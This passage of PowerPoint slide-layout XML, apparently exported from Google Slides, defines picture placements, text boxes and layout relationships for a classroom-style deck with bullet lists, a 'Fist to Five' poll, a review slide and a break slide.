          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1937" name="Google Shape;1937;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1938" name="Google Shape;1938;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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45. Bullets 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1939"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1940" name="Google Shape;1940;p9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41" name="Google Shape;1941;p9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942" name="Google Shape;1942;p9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943" name="Google Shape;1943;p9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944" name="Google Shape;1944;p9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945" name="Google Shape;1945;p9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46" name="Google Shape;1946;p97"/>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97"/>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48" name="Google Shape;1948;p97"/>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97"/>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50" name="Google Shape;1950;p97"/>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97"/>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52" name="Google Shape;1952;p97"/>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97"/>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54" name="Google Shape;1954;p97"/>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97"/>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56" name="Google Shape;1956;p97"/>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97"/>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58" name="Google Shape;1958;p97"/>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97"/>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60" name="Google Shape;1960;p97"/>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97"/>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962" name="Google Shape;1962;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1963" name="Google Shape;1963;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1964" name="Google Shape;1964;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1965" name="Google Shape;1965;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1966" name="Google Shape;1966;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1967" name="Google Shape;1967;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1968" name="Google Shape;1968;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1969" name="Google Shape;1969;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>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46. Bullets 1–8 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1970"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1971" name="Google Shape;1971;p9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72" name="Google Shape;1972;p9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973" name="Google Shape;1973;p9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974" name="Google Shape;1974;p9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975" name="Google Shape;1975;p9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976" name="Google Shape;1976;p9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77" name="Google Shape;1977;p98"/>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98"/>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79" name="Google Shape;1979;p98"/>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98"/>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81" name="Google Shape;1981;p98"/>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98"/>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83" name="Google Shape;1983;p98"/>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98"/>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85" name="Google Shape;1985;p98"/>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98"/>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87" name="Google Shape;1987;p98"/>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98"/>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89" name="Google Shape;1989;p98"/>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98"/>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91" name="Google Shape;1991;p98"/>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98"/>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993" name="Google Shape;1993;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1994" name="Google Shape;1994;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1995" name="Google Shape;1995;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1996" name="Google Shape;1996;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1997" name="Google Shape;1997;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1998" name="Google Shape;1998;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1999" name="Google Shape;1999;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2000" name="Google Shape;2000;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>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47. Fist to Five">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 2001"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2002" name="Google Shape;2002;p99"/>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2003" name="Google Shape;2003;p99"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="3307075"/>
            <a:ext cx="8595300" cy="15615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000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto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04" name="Google Shape;2004;p9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2005" name="Google Shape;2005;p99"/>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2006" name="Google Shape;2006;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="827549" y="769725"/>
            <a:ext cx="7488902" cy="1856625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2007" name="Google Shape;2007;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202525" y="2754341"/>
            <a:ext cx="8595300" cy="371100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="91425" rIns="0" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>FIST TO FIVE:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2008" name="Google Shape;2008;p99"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="3307075"/>
            <a:ext cx="45330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48. Review">
  <p:cSld name="CUSTOM_17_2_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 2009"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2010" name="Google Shape;2010;p100"/>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2011" name="Google Shape;2011;p10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2012" name="Google Shape;2012;p100"/>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13" name="Google Shape;2013;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="2880775"/>
            <a:ext cx="85953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a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Times Up! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Let’s Review.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2014" name="Google Shape;2014;p100"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3960959" y="1143000"/>
            <a:ext cx="1222082" cy="1638675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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49. Take a Break 1">
  <p:cSld name="CUSTOM">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 2015"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2016" name="Google Shape;2016;p10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2017" name="Google Shape;2017;p101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143971" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2018" name="Google Shape;2018;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="944800"/>
            <a:ext cx="91440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2019" name="Google Shape;2019;p101"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="2001900"/>
            <a:ext cx="45330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theme" Target="../theme/theme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63.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout68.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout76.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout89.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout71.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout84.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout92.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout97.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout100.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout52.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout66.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout79.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout61.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout74.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout82.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout87.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout90.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout95.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout65.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout73.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout86.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout99.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout60.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout69.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout81.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout94.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout54.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout59.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout64.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout72.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout77.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout80.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout85.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout93.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout98.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout58.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout53.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout62.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout67.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout75.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout83.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout88.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout96.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout70.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout91.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout51.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r">
